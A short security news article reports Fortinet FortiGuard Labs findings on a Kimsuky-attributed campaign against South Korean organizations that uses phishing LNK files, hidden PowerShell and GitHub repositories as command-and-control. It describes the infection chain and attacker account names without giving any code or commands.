Threat actors believed to be linked to the Democratic People’s Republic of Korea (DPRK) are leveraging GitHub as a command-and-control (C&C) platform in a multi-stage campaign targeting organizations in South Korea, researchers at Fortinet FortiGuard Labs said.
The attack begins with phishing emails carrying malicious Windows shortcut (LNK) files. Once opened, the files deploy a decoy PDF to distract victims while silently executing a hidden PowerShell script. The script initiates a series of anti-analysis checks, scanning for indicators of virtual machines, debugging environments, or forensic tools. If those are found, the malware stops immediately to avoid detection.
If the system passes the checks, the script proceeds to extract a secondary Visual Basic Script (VBScript) and establishes persistence by creating a scheduled task. The task ensures the malicious PowerShell payload is executed every 30 minutes in a hidden window, allowing it to survive system reboots and evade detection.
The malware then profiles the infected machine, collecting system data and storing it in a log file. The information is exfiltrated to a GitHub repository controlled by the attackers, specifically under an account named “motoralis,” using a hard-coded access token. Researchers found several additional GitHub accounts linked to the campaign, including “God0808RAMA,” “Pigresy80,” “entire73,” “pandora0009,” and “brandonleeodd93-blip.”
Researchers note that previous versions of the campaign distributed malware such as Xeno RAT. The activities have been attributed to the North Korean state-sponsored hacking group Kimsuky, known for targeting South Korean entities.
Last week, AhnLab SEcurity intelligence Center (ASEC) said it observed a change in Kimsuky’s method of distributing malicious LNK files. The overall attack flow remains largely the same, with a malicious LNK ultimately executing a Python-based backdoor or downloader.